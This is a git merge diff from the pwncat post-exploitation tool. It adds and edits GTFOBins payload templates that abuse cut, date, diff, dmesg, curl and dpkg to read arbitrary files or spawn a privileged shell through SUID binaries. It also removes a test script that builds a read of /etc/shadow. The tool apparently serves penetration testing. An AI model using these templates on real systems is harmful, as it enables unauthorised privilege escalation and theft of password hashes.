Merge branch 'master' of github.com:calebstewart/pwncat

data/gtfobins.json

@@ -110,7 +110,7 @@
 		},
 		{
 			"type": "read",
-			"stream": "print",
+			"stream": "raw",
 			"payload": "{command} -c '{cat} {lfile}'",
 			"suid": ["-p"],
 			"exit": "{ctrl_d}"
@@ -465,8 +465,8 @@
 		{
 			"type": "read",
 			"stream": "base64",
-			"payload": "{command}",
-			"args": ["-s", "file://{lfile} --output - | {base64} -w 0"]
+			"payload": "{command} | {base64} -w 0",
+			"args": ["-s", "file://{lfile} --output -"]
 		},
 		{
 			"type": "write",
@@ -485,8 +485,63 @@
 			"type": "write",
 			"stream": "base64",
 			"payload": "TF=none; {command}; TF=$({mktemp}); {chmod} ugo+r $TF; {base64} -d > $TF; {command}; rm -f $TF",
-			"args": ["-s", "file://$TF --output {lfile}"],
+			"args": ["-s", "file://$TF", "--output", "{lfile}"],
 			"exit": "{ctrl_d}"
 		}
+	],
+//-------------------------------------------------------------------
+	"cut": [
+		{
+			"type": "read",
+			"stream": "print",
+			"payload": "{command}",
+			"args": ["-d", "''", "-f1", "{lfile}"]
+		}
+	],
+//-------------------------------------------------------------------
+	"date": [
+		{
+			// This is a janky reader that relies on cut to fully carve out the output.
+			"type": "read",
+			"stream": "print",
+			"payload": "{command} | {cut} -d \":\" -f2- | while read line; do echo ${{line:14:-1}}; done",
+			"args": ["-f", "{lfile}", "+\"%M%M%M%M%M%M\"", "2>&1"]
+		}
+	],
+//-------------------------------------------------------------------
+	"diff": [
+		{
+			"type": "read",
+			"stream": "print",
+			"payload": "{command}",
+			"args": ["--line-format=%L", "/dev/null", "{lfile}"]
+		}
+	],
+//-------------------------------------------------------------------
+	"dmesg": [
+		{
+			"type": "shell",
+			"payload": "{command}",
+			"args": ["-H"],
+			"input": "!{shell} -p\n",
+			"exit": "exit\nq\n"
+		},
+		{
+			"type": "read",
+			"stream": "print",
+			"payload": "{command}",
+			"args": ["-rF", "{lfile}"]
+		}
+	],
+//-------------------------------------------------------------------
+	"dpkg": [
+		{
+			"type": "shell",
+			"payload": "{command}",
+			"args": ["-l"],
+			"input": "!{shell} -p\n",
+			"exit": "exit\nq\n"
+		}
 	]
+
 }

gtfobinstest.py

@@ -1,40 +0,0 @@
-#!/usr/bin/env python3
-
-
-from pwncat.gtfobins import *
-import subprocess
-
-
-def which(path: str, quote=False):
-    try:
-        output = subprocess.check_output(f"which {path}", shell=True)
-    except subprocess.CalledProcessError:
-        return None
-
-    return output.decode("utf-8").strip()
-
-
-gtfo = GTFOBins("data/gtfobins.json", which)
-
-
-binary_to_test = "curl"
-# capabilities_to_test = Capability.SHELL
-capabilities_to_test = Capability.WRITE
-# capabilities_to_test = Capability.WRITE
-our_shell = "/bin/bash"
-
-binary = gtfo.find_binary(binary_to_test)
-print(binary)
-print(vars(binary))
-
-methods = binary.iter_methods(
-    which(binary_to_test), caps=capabilities_to_test, stream=None
-)
-for method in methods:
-    # print(method)
-    # print(method.build(shell=our_shell, suid=True))
-    print(method.build(lfile="/etc/shadow", suid=True)[0])
-    # print(method.build(lfile="/tmp/test", data="hello")[0])
-
-# all_binaries = list(gtfo.iter_methods(Capability.SHELL))
-# print(all_binaries[0].build(shell="/bin/bash", suid=True))

pwncat/commands/base.py

@@ -26,7 +26,7 @@ class StoreConstOnce(argparse.Action):
     def __call__(self, parser, namespace, values, option_string=None):
         if hasattr(self, "__" + self.dest + "_seen"):
             raise argparse.ArgumentError(self, "only one action may be specified")
-        setattr(self, "__" + self.dest + "_seen", True)
+        setattr(namespace, "__" + self.dest + "_seen", True)
         setattr(namespace, self.dest, self.const)